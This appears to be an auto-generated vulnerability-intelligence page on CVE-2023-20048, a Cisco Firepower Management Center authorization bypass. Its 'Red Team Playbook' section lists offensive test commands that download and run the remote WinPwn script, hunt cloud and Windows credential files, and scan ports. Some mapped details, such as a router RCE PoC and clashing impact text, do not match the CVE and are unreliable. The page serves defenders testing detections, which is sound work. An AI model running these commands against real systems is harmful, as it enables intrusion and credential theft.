CVE-2023-20048
Overview
This vulnerability is an authorization bypass in the web services interface of Cisco Firepower Management Center (FMC) Software. The root cause is insufficient authorization checks on configuration commands sent via the FMC's web services API. The affected component is the FMC Software managing Firepower Threat Defense (FTD) devices, where certain configuration commands can be executed without proper privilege validation.
Vulnerability Description
A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software.
Impact
An attacker authenticated to the FMC web services interface can execute unauthorized configuration commands on managed FTD devices, potentially altering device behavior or security posture. This requires valid credentials with limited privileges (PR:L) but no user interaction. The attacker can compromise the integrity and availability of the FTD device configurations, leading to potential lateral movement or service disruption. The vulnerability has a CVSS vector indicating network attack vector, low attack complexity, and high impact on confidentiality and availability.
Solution
Cisco has released a security advisory (cisco-sa-fmc-cmd-inj-29MP49hN) addressing this vulnerability in Secure Firewall Management Center. Users should apply the updates provided in the advisory to affected FMC versions as soon as possible. The advisory details specific patch versions and upgrade instructions to remediate the insufficient authorization issue in the FMC web services interface.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the web services interface of Cisco Firepower Management Center Software presents a significant security risk due to its potential for unauthorized command execution on Firepower Threat Defense devices. This issue arises from insufficient authorization checks for configuration commands transmitted through the web services interface. An attacker with valid credentials can exploit this weakness by sending specially crafted HTTP requests to the affected device, thereby executing configuration commands that could alter the device's security posture or operational parameters. The lack of proper authorization mechanisms allows for a breach of trust, enabling attackers to manipulate network defenses without appropriate oversight.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting authenticated users of the Cisco Firepower Management Center. An attacker could gain access to valid credentials through phishing, social engineering, or credential stuffing attacks. Once authenticated, the attacker can leverage the web services interface to send malicious requests to the Firepower Threat Defense device. This could lead to unauthorized changes in firewall rules, network policies, or even the disabling of critical security features, which could compromise the integrity and confidentiality of the network environment.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Cisco's security solutions to protect sensitive data and maintain compliance with regulatory standards. A successful exploit could lead to unauthorized access to critical systems, data breaches, or even the complete compromise of network defenses. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications stemming from non-compliance with data protection regulations. Organizations may also face operational disruptions as they scramble to mitigate the effects of an attack, further exacerbating the overall impact.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted security strategy. Regular audits of user access and privileges within the Cisco Firepower Management Center are essential to ensure that only authorized personnel have the ability to execute configuration commands. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity patterns that may indicate exploitation attempts. Implementing network segmentation can also limit the potential damage by isolating critical systems from less secure areas of the network. Furthermore, keeping the Firepower Management Center and associated devices updated with the latest security patches is crucial in reducing the attack surface and mitigating known vulnerabilities.
In conclusion, the vulnerability in the web services interface of Cisco Firepower Management Center Software underscores the importance of robust authentication and authorization mechanisms in cybersecurity. Organizations must remain vigilant and proactive in their security posture to protect against potential exploits that could lead to severe consequences. By adopting comprehensive detection and mitigation strategies, businesses can better safeguard their networks and maintain the integrity of their security infrastructure.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-20048, reflecting a growing likelihood of exploitation in the near term. This upward trend, although not rapid, signals heightened attacker interest and potential expansion of exploit attempts targeting the Cisco Firepower Management Center’s web services interface. Concurrently, new proof-of-concept tools have surfaced on public repositories, enhancing the accessibility of exploitation techniques to a broader attacker base. Our telemetry indicates these developments could lower the barrier for adversaries to execute unauthorized configuration commands on Firepower Threat Defense devices, thereby increasing the risk of network compromise. While the overall threat level remains critical due to the vulnerability’s inherent severity, the observed escalation in exploitation potential necessitates increased vigilance. Defenders should recognize that the evolving exploit landscape may accelerate attack campaigns leveraging this flaw, underscoring the importance of continuous monitoring and threat intelligence integration.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
|
|
Cisco | Secure Firewall Management Center | All |
cpe:2.3:a:cisco:secure_firewall_management_center:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
oguzhanozuzun301/cisco-rv-rce-poc
PoC and exploit scripts for CVE-2023-20048 - Remote Code Execution vulnerability affecting Cisco RV series routers. Inc...
|
oguzhanozuzun301 | 1 | 1 | 2025-09-22 | View |
|
0zer0d4y/FuegoTest
A CLI tool for detecting CVE-2023-20048 vulnerability in Cisco Firepower Management Center.
|
0zer0d4y | 0 | 0 | 2024-03-14 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-58 | Restful Privilege Elevation |
35%
|
High | High | |
| CAPEC-122 | Privilege Abuse |
33%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
33%
|
— | — |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20048 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-29MP49hN |